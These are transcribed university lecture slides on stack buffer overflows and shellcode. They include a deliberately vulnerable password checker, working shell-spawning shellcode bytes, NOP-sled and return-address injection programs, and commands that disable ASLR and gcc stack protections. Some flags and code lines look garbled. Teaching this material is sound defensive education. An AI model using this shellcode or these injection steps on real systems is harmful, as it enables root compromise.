How Computers Get Hacked - Georgia Institute of Technology

Download Report

Transcript How Computers Get Hacked - Georgia Institute of Technology

Shellcode
Georgia Tech ECE6612
Computer Network Security
Reference: "Hacking: the Art of Exploitation,"
Jon Erickson,
2nd ed., ISBN-13: 978-1-59327-144-2
Reviewed by John Copeland 3/30/14
A computer is exploited ("hacked") if an unauthorized person
gains access to the computer's data and computing resources.
This can be done by:
1. discovering a valid username and password (e.g.,
guessing or social engineering),
2. injecting crafted data into a vulnerable program to
make it do things it should not do (e.g., SQL injection to extract
private data, or cause a "buffer overflow" to alter data),
3. injecting "shell code" into the computer memory, and
then getting the computer to execute that code.
These slides will demo and discuss the second and third
techniques:
1. What is "shellcode".
2. How can it be injected.
3. How can it be run.
2
These slides will build up a foundation for further study using the book
"Hacking, the Art of Exploitation," ed.2, by Jon Erickson*.
Once techniques are known, defenses are incorporated. The hacker
community then develops new techniques, and the cycle repeats.
The book discusses the technological basis for past exploits, and details
several cycles of hackers versus operating system developers. Neither
the book nor these slides show specific techniques that can be used
against current, updated operating systems. It does show how to
construct a program for testing another program's susceptibility for buffer
overflows, illustrating how hackers continually find new vulnerabilities.
"Honey Pots" are computers set up to attract attacks so that the newest
exploit code can be studied. The best code today uses sophisticated
encryption and obfuscation techniques to prevent disassembly.
Observing the network activity of an infected computer often does
provide valuable information, especially if the covert channel techniques
being used can be discovered.
*www.nostarchpress.com
3
Vulnerabilities Fixed in two versions on SeaMonkey Browser (Firefox with Editing)
Fixed in SeaMonkey 2.0.12
MFSA 2011-10 CSRF risk with plugins and 307 redirects
MFSA 2011-08 ParanoidFragmentSink allows javascript: URLs in chrome docs
MFSA 2011-07 Memory corruption during text run construction (Windows)
MFSA 2011-06 Use-after-free error using Web Workers
MFSA 2011-05 Buffer overflow in JavaScript atom map
MFSA 2011-04 Buffer overflow in JavaScript upvarMap
MFSA 2011-03 Use-after-free error in JSON.stringify
MFSA 2011-02 Recursive eval call causes confirm dialogs to evaluate to true
MFSA 2011-01 Miscellaneous memory safety hazards (rv:1.9.2.14/ 1.9.1.17)
Fixed in SeaMonkey 2.0.11
MFSA 2010-84 XSS hazard in multiple character encodings
MFSA 2010-83 Location bar SSL spoofing using network error page
MFSA 2010-82 Incomplete fix for CVE-2010-0179 [see http://cve.mitre.org/cve/]
MFSA 2010-81 Integer overflow vulnerability in NewIdArray
MFSA 2010-80 Use-after-free error with nsDOMAttribute MutationObserver
MFSA 2010-79 Java security bypass from LiveConnect loaded via data: URL refresh
MFSA 2010-78 Add support for OTS font sanitizer
MFSA 2010-77 Crash and remote code execution using HTML tags inside a XUL tree
MFSA 2010-76 Chrome privilege escalation with window.open and <isindex> element
MFSA 2010-75 Buffer overflow while line breaking after document.write with long string
MFSA 2010-74 Miscellaneous memory safety hazards (rv:1.9.2.13/ 1.9.1.16)
4
The C Programming Language
by Brian W. Kerningham and Dennis M. Ritchie*
Developed along with UNIX in 1975 at Bell Labs, Murray Hill, NJ
#include <time.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
char progid[80] = "square_it.c by John Copeland 4/1/2011" ;
int do_square( int x) // "x" here is a local variable, stored in a different
{
// location (on the stack) from the "x" in main
x=x*x;
return( x ) ;
}
int main(int argc, char * argv[ ])
{
int x, y ; // modern: replace "int" with "int32_t"
char buf[100] ;
printf("\n%s\n", progid ) ;
while(1)
{
printf("\n Type number (q = quit) : ") ;
gets( buf ) ;
if( buf[0] == 'q' ) break ;
x = atoi( buf ) ;
y = do_square( x ) ;
printf("
The square of %d is %d\n", x, y );
}
return( 0 ) ;
}
$ gcc -W all -o square_it square_it.c
$ copeland$ ./square_it
square_it.c by John Copeland 4/1/2011
warning: this program uses gets(), which is unsafe.
Type number (q = quit) : 2
The square of 2 is 4
Type number (q = quit) : 3
The square of 3 is 9
Type number (q = quit) : q
$
*Prentice Hall; ed 2 (1988), ISBN-10: 0131103628,ISBN-13: 978-0131103627, $48
Handy reference: http://www.acm.uiuc.edu/webmonkeys/book/c_guide/ (dated 1997 )
5
Integer and Character Declarations
Old-Style Length in Bits
CPU Type
Variable
Type
DEC
PDP-11
Honeywell
6000
IBM 370
Interdata
8/32
32-bit
Intel PC,
IA32
char
8
9
8
8
8
short int
16
36
16
16
16
int
16
36
32
32
32
long int
32
36
32
32
32
long long
int
32
36
32
32
64
float
(double/2)
64
36
32
64
32
// modern style: "int x ;" can be replaced by "int32_t x ;"
#include <stdint.h>
int32_t x ; uint8_t c ;
6
C without memory pointers, is no C at all
int64_t X, *P, A[10] ;
char
S[100]
;
// int64_t replaces "long long"
// string up to 99 chars, S[99] must = 0 (null)
Kept in Symbol Table
Name
In Executable Program
Type of Variable
Memory Allocated (bytes)
X
8-byte integer
200-207, is the value of X
P
4-byte pointer to
8-byte integer
210-213, for memory-address
A
4-byte pointer to
8-byte integer
20-99, for 10 8-byte integers
S
4-byte pointer to
1-byte character
100-199 for 100 1-byte
characters (integers)
Equivalents:
X and *( &X ) -also- S[10] and *(S+10)
after P = &X : X and *P and P[0] and *(P + 0 )
"&" means "address of _", * means "value pointed to by _"
7
How Programs are Stored in Memory,
and subroutine arguments are put on stack.
Lowest
Address
Process Memory
Text or Code Segment
Data Segment
BSS Segment (data)
Heap Segment
Created by a
subroutine or
function call --->
(grows toward higher
addresses)
Stack Segment
Highest
Address
(grows toward lower
addresses)
Stack Frame
Return-Value Pointer
Local Variables (e.g.):
char buffer[10]
int flag
Saved Frame Pointer
Return Instruction Ptr †
Subroutine Input
Arguments (passed
by value)
† Modify this address to point at shell code, then return
(set program counter) to this address when done.
Erickson pp. 69-75
8
Subroutine Calls
Program
Counter
PC or EIP
10000 ->
10008 ->
Text (Code) Segment
main( )
y = do_square( x )
printf( … )
Stack
Data or BSS
Segment
Buffer, flags
Return Value Ptr
Augment x: 2 -> 4
x: 2
y: _ -> 4
Saved Frame Pointer
PC return: 10008
square_it( )
40000 ->
x=x*x
40008 ->
return( x )
Input Augment 2
Stack Frame
A subroutine call adds memory locations to the top of
the stack, to hold all the local variables and the return
value for the Program Counter (and Stack Pointer).
9
Strings in C
A string is an array of characters, terminated by a null byte ('\0').
C does not store the length, or maximum length, of a string.
Frequent coding error: forgetting that S below can only hold 9 characters.
char S[10], c='a', T[ ]="predefined", A[3][ ]={"yes","no","?"},*P;
Memory: 0000000000apredefined0yes0no00?000PPPP //each char is a byte
Program Line: printf("Results: %c.%s.\n", c, T ) ;
Results:
a.predefined.
Program Line: gets( S ) ; //input from keyboard, note S is a char ptr
User types: "c.abcdefghijI GOT YOU !"
// > 10 characters
Memory: abcdefghijI GOT YOU ! yes0no00?000PPPP //each char is a byte
Program Line: printf("Results: %c.%s.\n", c,T ) ;
Results:
I. GOT YOU ! .
Cure: fgets( S, 9, stdin) ; // limits input string to 9 characters
We can see that a buffer overflow will mess up data, but how do we
1) put executable code in a string, and 2) execute it?
Erickson pp. 5-114
10
Stack Buffer-Overflow
// authenticate_me.c should grant access to only "john" or "cope"
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int check_auth( char *password) {
char pw_buffer[16] ;
int auth_flag = 0 ;
strcpy(pw_buffer, password ) // string copy
if(strcmp( password_buffer, "john" ) == 0 ) // string compare
auth_flag = 1 ;
if(strcmp( pw_buffer, "cope" ) == 0 ) // string compare
auth_flag = 1 ;
return( auth_flag ) ;
}
int main( int argc, char * argv[ ]) {
if( check_auth( argv[ 1 ] ) // if return-augument != 0
printf(" ### Access Granted ### ") ; // for "john" or "cope"
else
printf(" ### Access Denied ### ") ; // anything else
return( 0 ) ;
}
Erickson p. 122
11
Testing "Authenticate_Me"
$ ./authenticate_me john
### Access Granted ###
$ ./authenticate_me cope
### Access Granted ###
$ ./authenticate_me nobody
### Access Denied ###
$ ./authenticate_me xxxxxxxxxxxxxxxx
Overwriting "auth_flag"
### Access Granted ###
$ ./authenticate_me xxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Overwriting PC return
value in the preceding
stack frame.
Segmentation fault
$
Hackers use programs that automatically try all lengths of input to find a length
that does what they want.
12
Fuzzers
A "Fuzzer" is a program that generates quasi-random data
input to a program to test for unanticipated problems.
For example, putting increasing long command line
arguments in "Authenticate-Me" would show a range that
produced segmentation faults, the a range that worked to
get authenticated.
Black-box Fuzzer – produces random input data.
White-box Fuzzer – uses algorithms to increase the codecoverage for testing known code.
13
Shellcode
"Shellcode" is binary code that will execute without being
processed by a "Loader".
1. Must make kernel system calls directly (no standard lib.s)
2. Must use absolute or relative jumps (no relocatable jumps)
3. Must be written using assembly language, and with a
limited set of commands (e.g., no labels).
Development can be helped by looking at assembly code
generated by the C compiler, using the gdb debugger.
The original shell code (shown later) starts a shell (e.g.,
/bin/sh) running so that a command prompt is available. If the
vulnerable program is a SUID program (e.g., passwd), then the
shell user is "root." Now "shell code" has come to include any
similar code with other functions (e.g., installing a back door).
Erickson pp. 281-318
14
Hooking Code
Program
Counter
(PC or EIP)
10000 ->
10008 ->
Text (Code) Segment
Stack
SP ->
main( )
y = do_square( x )
printf( … )
buffer (unused)
Return Value: 4
Augment x: 2 -> 4
Saved Frame Pointer
do_square( )
40000 ->
x=x*x
40008 ->
return( x )
Input Augment 2
Previous
Stack Frame
80000 ->
starting instruction
more instructions
jump 10008
Sled of NOP's
PC return: 80000
Later PC Return
Shellcode
Data Overflow
to Inject New
"PC Return"
Shellcode
Repeated Address
(hopefully -> sled)
Exploit code that installs shellcode must:
Get the PC return value from the Stack for
the final "jump" state (or let it crash later).
Know where the shellcode has been
written in memory, to reset the PC return.
The shellcode can reset the stack based
on the current SP and SFP values.
15
Putting Binary Shellcode into a String, on Command Line
// type_shellcode.c
// compile: gcc type_shellcode.c -o type_shellcode
// output to stdout a (4 x argv[1])-byte sled, shell code, and then argv[2]
// start addresses argv[3-6]: ./type_shellcode 10 20 191 255 248 92
//
40-byte sled, shellcode, 20 times 0xbffff85c *
#include <stdio.h> ;#include <stdlib.h> ;#include <string.h> ; #include <sys/stat.h>
char shellcode[ ] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80"
"\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80"; // 36 bytes + ‘\x00’
int main(int argc, char * argv[ ]) {
int i , n ;
char c[4] ;
Build sled - 10 nop's
n = 4 * atoi( argv[ 1 ] ) ;
//
n = 10
for(i = 0; i < n ; i++) printf("%c",'\x90');// build sled of NOPs
printf("%s", shellcode ) ;
c[0]=atoi(argv[3]); c[1]=atoi(argv[4]); // 191 255 = hex bf ff
c[2]=atoi(argv[5]); c[3]=atoi(argv[6]); // 248 92 = hex f8 5c
n = atoi( argv[ 2 ] ) ;
// n = 20
Print shellcode
for(i = 0; i < n ; i++)
printf("%c%c%c%c", c[0],c[1],c[2],c[3]); // start addresses
return( 0 ) ;
Build block - 20 ret's
}
Usage: > ./authenticate_me
$(./type_shellcode 10 20
191 255 248 92 )
// To run, you must use gdb to find the right value of the starting address.
// bash shell expands $( ./x ) to output of program ./x
// *This is for a G4 CPU. For an Intel CPU, reverse the order of address-byte integers.
16
To see where pw_buffer is stored, add a line:
printf(" ======= &pw_buffer = %x = %u\n",
(unsigned int) &pw_buffer, (unsigned int)
&pw_buffer ) ;
and comment out other printf() lines:
$./authenticate_me john
======= &pw_buffer = bfe27540 = 3,219,289,408
$./authenticate_me john
======= &pw_buffer = bfecb010 = 3,219,959,824
$./authenticate_me john
======= &pw_buffer = bfe35480 = 3,219,346560
$./authenticate_me john
======= &pw_buffer = bfe7b720 = 3,219,633952
$./authenticate_me john
======= &pw_buffer = bff71840 = 3,220,641,856
$./authenticate_me john
======= &pw_buffer = bff96ad0 = 3,220,794,064
$./authenticate_me john
======= &pw_buffer = bffeaab0 = 3,221,138,096
Address space layout randomization (ALSR)
Stack Overflow Injection
is now difficult because
the address of the stack
frame varies over a
range of 2,000,000
bytes, each time the
modified program was
run.
It only needs to work
once. By automatically
trying up to a million
times, a single hit is
probable, and that can
install a back door to
root. (see p. 384-391)
17
Run a program with execle() to limit the Environment. Put the
shellcode into the only Environment string, env[0]. The overflow
string (buffer) only has to have the starting address (ret),
repeated many times.*
// execle_run.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdint.h>
int main(int argc, char *argv[ ]) {
char *env[2][ ] = {"\x31\xc0\x31 … \xcd\x80", NULL}; //Must be NULL
uint_32 i, ret = 0xbffffffa;//address of env[0] in "authenticate_me"
char buffer[161] ;
for(i=0;i<160;i+=4)
*( (uint32_t*) (buffer+i) ) = ret ; // put in 4-byte address
buffer[160] = 0 ;
execle("./authenticate_me", "authenticate_me", buffer, NULL, env );
return( 0 ) ;
}
* Erickson pp. 149-150
** With today's (2011) Linux, "ret" has to match a different value
on each run, even when execle() is used.
18
Buffer overflows can be used to:
Alter data later used in control statements.
Input data and control data on stack.
Inject shellcode and cause it to be executed.
Basic problem:
Input data and Program-Counter return values
are kept on the stack.
PC can point to a stack address.
Other types of overflows:
Stack segment overflow (p. 150)
Function pointer overflow (p. 156)
Printf format strings(p.171)
Examine stack values
Read arbitrary values from memory
Write arbitrary values to memory
19
Present day c compilers (gcc) and Linux are designed to defeat most of the techniques
discussed in "Hacking, the Art of Exploitation".
For those of you who would like to experiment with code that has vulnerabilities, you can
turn some of these protections off in the OS, and in the gcc compiler:
*** to disable ASLR (Address Space Layout Randomization) : This change is immediate on
the running OS kernel
(run with root privileges).
sudo echo 0 > /proc/sys/kernel/randomize_va_space
(when done: echo 1 > /proc/sys/kernel/randomize_va_space)
*** To turn off gcc protections when you compile your program, use options
-fno-stack-protector
this will disable canaries
-fno-stack-protector-all
-fno-address-sanitizer
Turn off AddressSanitizer, a memory error detector.
-fno-memsafety
-z execstack
this will disable executable stack protection
-fnomudflap
this will disable protections for risky pointer
operations that may be used in overflows - to not catch runtime memory
access errors.
Example gcc compile:
> gcc –g -fno-stack-protector -z execstack –Wall –o program program.c
-Wall shows all warnings, always good to have,
-g so you can use gdb to show c code lines, and variable locations.
Information provided by Dr. Selcuk Uluagac, GT ECE (now at Fla. International U.)
20
Networking, Chapter 4
Concise explanation of of sockets, protocol stack, formats, …
Simple code for:
Server program (p.204)
Web Server program (p.213)
Network traffic sniffing (p.224)
Source code for Nemesis (arp spoofing, p.245)
SYN flood, Ping of Death, Ping Flood, …
TCP/IP highjacking (p.258)
Port scanning (p.264)
Pro-active defense (p.267)
Port-binding shellcode (p.278)
21
Shellcode, Chapter 5
Using ASM to write assembly code (p.281)
Linux system calls (p.283)
Investigating with gdb (p.289)
Removing null bytes (p.290)
Shell-spawning shellcode (the original, p.295)
Port-binding shellcode (for backdoors, p.303)
Connect-back shellcode (defeat firewalls, p.314)
22
Counter Measures, Chapter 6
Counter measures that detect intrusion (p.320)
Log files (p.334)
Rootkit techniques (p.348)
Socket reuse (p.355)
Payload smuggling (hiding signatures, p.359)
Polymorphic Printable ASCII shellcode (p.366)
Non-executable stack (available, not used, p.376)
Randomized stack space (seen earlier, p.379)
Defeating above (p.388)
23
Cryptology, Chapter 7
Basics (p.393)
Symmetric encryption (p.398)
Asymmetric encryption (p.400)
Hybrid Ciphers (man-in-the-middle attacks, p.406)
SSH attacks
Password Cracking (p.418)
Dictionary attacks, Rainbow Tables
Wireless 802.11b WiFi encryption (p.436)
WPA attacks - not covered
Conclusion, Chapter 8 (pp. 452-453)
24